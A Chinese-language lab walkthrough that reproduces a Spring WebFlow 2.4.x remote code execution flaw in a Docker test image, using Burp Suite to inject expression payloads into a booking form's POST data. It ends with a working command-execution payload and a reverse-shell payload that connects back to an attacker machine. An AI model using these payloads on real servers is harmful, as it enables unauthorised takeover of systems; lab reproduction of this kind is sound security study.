0x00
影响版本:
Spring WebFlow 2.4.0 ~ 2.4.4
实验环境:
从docker拉取,命令:
$ docker pull medicean/vulapps:s_springwebflow_1
启动环境:
$ docker run -d -p 80:8080 medicean/vulapps:s_springwebflow_1
用浏览器访问http://IP/login,左边有几个可以登录的账户,随便选一个登录。
image.png
进入http://192.168.88.140/hotels/1网址,然后点击“Book Hotel”,按照要求填写表格完以后点击“Proceed”。
image.png
这时候打开burpsuite抓包
然后点击“Confirm”
image.png
看到抓取到的POST数据
image.png
添加payload
image.png
会返回500的状态码
image.png
这时候进入到docker里面就可以看到已经在/tmp下成功创建了success文件。
是进入到docker里面,而且image_id后面要跟/bin/bash
_(new java.lang.ProcessBuilder("touch","/tmp/success")).start()=vulhub
//或者我们向其中添加一个字段(也就是反弹shell的POC)
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/【攻击机内网ip】/21 0>&1")).start()=vulhub
网友评论